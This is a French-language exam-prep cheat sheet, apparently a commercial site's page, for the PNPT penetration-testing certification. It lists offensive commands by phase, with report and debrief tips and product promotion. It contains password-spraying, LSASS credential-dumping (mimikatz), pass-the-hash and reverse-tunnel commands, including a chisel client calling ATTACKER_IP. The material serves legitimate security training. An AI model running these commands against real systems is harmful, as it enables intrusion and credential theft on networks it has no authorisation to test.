Cheatsheet PNPT 2026

Les commandes et le workflow de l'examen TCM Security Practical Network Penetration Tester — OSINT, accès externe, Active Directory, pivoting, le rapport professionnel et le debrief oral de 15 minutes.

Mis à jour :

Navigation rapide

01 OSINT & Recon externe 02 Accès externe 03 Active Directory 04 Pivoting & Tunneling 05 Post-Exploitation 06 Rapport & Debrief 07 Conseils Examen

# OSINT & Recon externe

Le PNPT commence là où commence une vraie mission : la reconnaissance externe. Énumère les employés, emails et services exposés pour construire ton foothold initial.

💡 Astuce PNPT : l'OSINT alimente l'accès initial. Un format d'email valide + un portail exposé mènent souvent à un foothold par password spray.
theHarvester -d TARGET.com -b all
Récupère emails, sous-domaines et hôtes depuis des sources publiques
subfinder -d TARGET.com -silent | httpx -silent -title -tech-detect
Énumère les sous-domaines et fingerprint les services externes vivants
curl -s 'https://crt.sh/?q=%.TARGET.com&output=json' | jq -r '.[].name_value' | sort -u
Certificate transparency — révèle portails, VPN, webmail, staging
nmap -p- --min-rate=1000 -T4 TARGET -oN ext_ports.txt
Scan de ports externe complet des hôtes dans le périmètre

# Accès externe

Transforme l'OSINT en foothold : password spraying sur les portails exposés, exploitation web et réutilisation de credentials.

netexec smb TARGET -u users.txt -p 'Saison2026!' --continue-on-success
Password spraying — un mot de passe sur plusieurs utilisateurs (évite le lockout)
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc all -fc 404
Découvre le contenu web caché de l'application externe
sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
Teste l'application web externe pour l'injection SQL

# Pivoting & Tunneling

Le PNPT va de l'externe vers l'interne. Pivote depuis ton foothold externe vers le LAN de l'entreprise.

./proxy -selfcert # ligolo-ng sur Kali, puis ajoute la route du tunnel
Démarre le proxy ligolo-ng pour atteindre le sous-réseau interne
./chisel server -p 8080 --reverse # client : ./chisel client ATTACKER_IP:8080 R:socks
Proxy SOCKS5 inverse à travers l'hôte compromis
proxychains4 netexec smb 10.10.0.0/24
Énumère le réseau interne à travers le proxy SOCKS

# Post-Exploitation

Récupère des credentials, dump les secrets et démontre l'impact une fois les hôtes possédés.

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Dump les creds en clair et les hashes depuis la mémoire LSASS
whoami /priv # cherche SeImpersonate → GodPotato pour SYSTEM
Vérifie les privilèges du token pour l'élévation locale
netexec smb 10.10.0.0/24 -u ADMIN -H NTLM_HASH --shares
Diffuse le hash DA pour cartographier les hôtes et partages accessibles

# Rapport & Debrief

Le PNPT ne s'arrête pas au Domain Admin. Tu dois livrer un rapport professionnel ET le défendre lors d'un debrief oral de 15 minutes.

💡 Astuce PNPT : le debrief teste la compréhension, pas l'exécution. Pour chaque étape, sois prêt à expliquer POURQUOI ça a marché et comment le remédier.
# Résumé exécutif → Narratif d'attaque (chemin vers DA) → Synthèse compromission AD → Findings → Recommandations
Le squelette du rapport PNPT — assez clair pour être présenté en direct
# Prépa debrief : schéma du chemin d'attaque + 1 phrase « pourquoi » par étape + remédiation
Répète ton déroulé de 15 minutes avec l'examinateur

# Conseils Examen PNPT

Stratégie pour les 5 jours d'examen, le rapport, et le debrief oral.

🕵️ Commence par l'OSINT : ton foothold vient généralement de la recon externe — énumère utilisateurs et portails avant tout.
🗣️ Prépare le debrief tôt : prends des notes propres et des captures au fil de l'eau pour que le déroulé de 15 minutes soit sans effort.
🏰 L'AD interne est le cœur : pratique Responder, ntlmrelayx, BloodHound et le mouvement latéral jusqu'à l'automatisme.
📝 Le rapport compte : rédige un vrai rapport type client — il est noté et pilote ton debrief.
🔁 Un retake gratuit : le PNPT est pensé pour être accessible — pas de panique, la méthodologie prime sur la vitesse.

❓ Questions fréquentes PNPT

Le PNPT de TCM Security est un examen pratique de 5 jours sur un réseau Active Directory réaliste, suivi de 2 jours pour rédiger un rapport professionnel, et d'un debrief oral obligatoire de 15 minutes où tu présentes tes résultats à un examinateur TCM. Il faut compromettre le domaine ET défendre ta méthodologie.

Le debrief est un appel vidéo en direct de 15 minutes avec un examinateur TCM après la remise de ton rapport. Tu déroules ton chemin d'attaque et réponds aux questions. Il teste la compréhension, pas seulement l'exécution — tu dois expliquer POURQUOI chaque étape a fonctionné.

Le PNPT est souvent vu comme plus accessible et réaliste : forte composante externe-vers-interne et OSINT, gros focus Active Directory, pas de buffer overflow, et un debrief oral. L'OSCP a des machines indépendantes et une fenêtre plus courte de 23h45. Les deux sont respectés ; le PNPT met l'accent sur un vrai workflow de mission.

theHarvester et les outils OSINT, nmap, Responder et ntlmrelayx, BloodHound, impacket (GetUserSPNs, secretsdump, psexec), NetExec/CrackMapExec, evil-winrm, mimikatz, et ligolo-ng ou chisel pour le pivoting. Le rapport se rédige comme une vraie mission client.

Oui — c'est le cœur de l'examen. Après le foothold externe, tu pivotes en interne et attaques l'AD : empoisonnement LLMNR/NBT-NS (Responder), relais NTLM, Kerberoasting, pass-the-hash, token impersonation et mouvement latéral jusqu'au Domain Admin.

Très importante. Contrairement à la plupart des examens, le PNPT commence par une phase OSINT externe — énumération des employés, emails et services exposés pour construire un foothold (par exemple un password spray sur un portail exposé). L'OSINT alimente directement l'accès initial.

Non. Le PNPT n'inclut pas d'exploitation manuelle de buffer overflow. Il se concentre sur l'OSINT, l'accès externe, l'Active Directory, le pivoting et le reporting — un workflow de test d'intrusion réseau interne réaliste.

Oui. Le voucher PNPT inclut un retake gratuit, et le modèle de TCM Security est pensé pour être accessible. Vérifie la politique actuelle de TCM Security pour les détails exacts avant de programmer.

Un rapport professionnel type client : résumé exécutif, périmètre, narratif d'attaque (chemin vers Domain Admin), findings techniques avec sévérité et remédiation, et recommandations stratégiques. Il doit être assez clair pour être présenté en direct pendant le debrief de 15 minutes.

Oui — comme accélérateur de préparation. La mindmap gratuite organise 12 020+ commandes couvrant les domaines PNPT (OSINT, AD, pivoting), l'Espace Pentest inclut un template de rapport PNPT dédié avec une synthèse de compromission AD, et l'AI Wizard génère un rapport style PNPT. Respecte toujours les règles de ton examen.

📚 Ressources liées

Rapport PNPT assisté par IA

Transforme tes findings en rapport PNPT avec une synthèse de compromission AD — l'AI Wizard a un format PNPT dédié prêt pour ton debrief.

Essayer gratuitement →

Prépare ton PNPT avec 12 020+ commandes

Cette cheatsheet n'est que la surface. Pentest Mindmap organise 12 020+ commandes en 34 catégories avec recherche instantanée, un template de rapport PNPT et un générateur de rapport IA.

Commencer gratuitement →
📎 Cette cheatsheet t'a été utile ?